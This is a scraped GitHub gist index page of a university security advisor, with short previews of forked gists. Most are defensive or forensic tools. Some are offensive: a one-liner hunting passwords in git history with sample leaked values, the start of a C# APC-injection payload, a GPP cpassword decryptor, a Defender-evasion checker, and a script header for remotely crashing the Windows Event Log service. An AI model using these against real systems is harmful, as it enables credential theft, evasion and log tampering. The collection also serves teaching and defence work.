Jesse Moore jessefmoore

Sr. Cybersecurity Advisor @ University of Washington. Interested in teaching Admins about Red Team, Forensics, Detection, and defense/secure configs.

99 followers · 477 following

View GitHub Profile

Recently created

Least recently created

Recently updated

Least recently updated

jessefmoore / Git Creds.md

Created May 3, 2021 14:45 — forked from int0x80/Git Creds.md

Finding creds in git repos is awesome.

$ for commit in $(seq 1 $(git reflog | wc -l)); do git diff HEAD@{$commit} 2>/dev/null | grep password; done
-spring.datasource.password=g!'301T%y%xT@uL`
+spring.datasource.password=4AT&G;[H@&'\^uDK
-spring.datasource.password=UmAnR=-v|{2=gyx?
+spring.datasource.password=4AT&G;[H@&'\^uDK
...

jessefmoore / Non_Microsoft_UserMode_Load_Audit.xml

Created March 1, 2021 17:48 — forked from mgraeber-rc/Non_Microsoft_UserMode_Load_Audit.xml

A WDAC audit-mode policy that will log all non-Windows-signed PE loads

	<?xml version="1.0" encoding="utf-8"?>
	<SiPolicy xmlns="urn:schemas-microsoft-com:sipolicy">
	<VersionEx>10.0.1.0</VersionEx>
	<PolicyID>{A244370E-44C9-4C06-B551-F6016E563076}</PolicyID>
	<BasePolicyID>{A244370E-44C9-4C06-B551-F6016E563076}</BasePolicyID>
	<PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID>
	<Rules>
	<Rule><Option>Enabled:Unsigned System Integrity Policy</Option></Rule>
	<Rule><Option>Enabled:Audit Mode</Option></Rule>
	<Rule><Option>Enabled:Advanced Boot Options Menu</Option></Rule>

jessefmoore / WSL2-Kali.md

Created January 23, 2021 16:53

WSL2 - Kali Linux

Kali Linux on Windows Subsystem for Linux (WSL)

This doc describes how to install Kali Linux on WSLv2.

WSL Docs

https://docs.microsoft.com/en-us/windows/wsl/about

Install

jessefmoore / gadget2jscriptQueueAPCInject.cs

Created November 10, 2020 19:51 — forked from rvrsh3ll/gadget2jscriptQueueAPCInject.cs

	using System;
	using System.IO;
	using System.Diagnostics;
	using System.Reflection;
	using System.Runtime.InteropServices;
	using System.Net;
	using System.IO.Compression;

	public class Payload
	{

jessefmoore / GPPDecrypt.ps1

Created October 31, 2020 22:30 — forked from andreafortuna/GPPDecrypt.ps1

Group Policy Preferences Decoder

	param (
	[string]$cpassword
	)

	function Get-DecryptedCpassword {
	[CmdletBinding()]
	Param (
	[string] $Cpassword
	)

jessefmoore / stickynoteparser.py

Created October 16, 2020 15:31 — forked from daddycocoaman/stickynoteparser.py

Parses sticky note files in .snt/.sqlite formats. Sqlite files may require the WAL and SHM files of the same name as well. Once run, WAL/SHM files will be merged into .sqlite file.

	import json
	import sqlite3
	import olefile
	import argparse

	def parse_snt_file(file):
	# https://www.tutorialspoint.com/python_digital_forensics/python_digital_forensics_important_artifacts_in_windows
	if not olefile.isOleFile(file):
	return "Invalid OLE file"

jessefmoore / One Liner to download the latest release from your GitHub repo.md

Last active September 27, 2020 19:11 — forked from gvenzl/One Liner to download the latest release from your GitHub repo.md

One Liner to download the latest release from your GitHub repo

LOCATION=$(curl -s https://api.github.com/repos/<YOUR ORGANIZTION>/<YOUR REPO>/releases/latest \
| grep "tag_name" \
| awk '{print "https://github.com/<YOUR ORGANIZATION>/<YOUR REPO>/archive/" substr($2, 2, length($2)-3) ".zip"}') \
; curl -L -o <OUTPUT FILE NAME> $LOCATION

for example:

LOCATION=$(curl -s https://api.github.com/repos/byt3bl33d3r/CrackMapExec/releases \
| grep "tag_name" \

jessefmoore / pydefendercheck.py

Created September 24, 2020 21:24 — forked from daddycocoaman/pydefendercheck.py

PyDefenderCheck

	##################################################
	## PyDefenderCheck - Python implementation of DefenderCheck
	##################################################
	## Author: daddycocoaman
	## Based on: https://github.com/matterpreter/DefenderCheck
	##################################################


	import argparse
	import enum

jessefmoore / feedly-olafhartong-2020-09-24.opml

Created September 24, 2020 20:32 — forked from olafhartong/feedly-olafhartong-2020-09-24.opml

	<?xml version="1.0" encoding="UTF-8"?>

	<opml version="1.0">
	<head>
	<title>Olaf subscriptions in feedly Cloud</title>
	</head>
	<body>
	<outline text="PublicFeeds" title="PublicFeeds">
	<outline type="rss" text="top scoring links : netsec" title="top scoring links : netsec" xmlUrl="http://www.reddit.com/r/netsec/top/.rss" htmlUrl="https://www.reddit.com/r/netsec/top/"/>
	<outline type="rss" text="For [Blue\|Purple] Teams in Cyber Defence" title="For [Blue\|Purple] Teams in Cyber Defence" xmlUrl="https://www.reddit.com/r/blueteamsec.rss" htmlUrl="https://www.reddit.com/r/blueteamsec"/>

jessefmoore / eventvwr_crash.py

Created September 19, 2020 03:29 — forked from byt3bl33d3r/eventvwr_crash.py

Crash the Windows Event Log service remotely (needs admin privs)

	# Crash the Windows Event Log Service remotely, needs Admin privs
	# originally discovered by limbenjamin and accidently re-discovered by @byt3bl33d3r
	#
	# Once the service crashes 3 times it will not restart for 24 hours
	#
	# https://github.com/limbenjamin/LogServiceCrash
	# https://limbenjamin.com/articles/crash-windows-event-logging-service.html
	#
	# Needs the impacket library (https://github.com/SecureAuthCorp/impacket)

Newer Older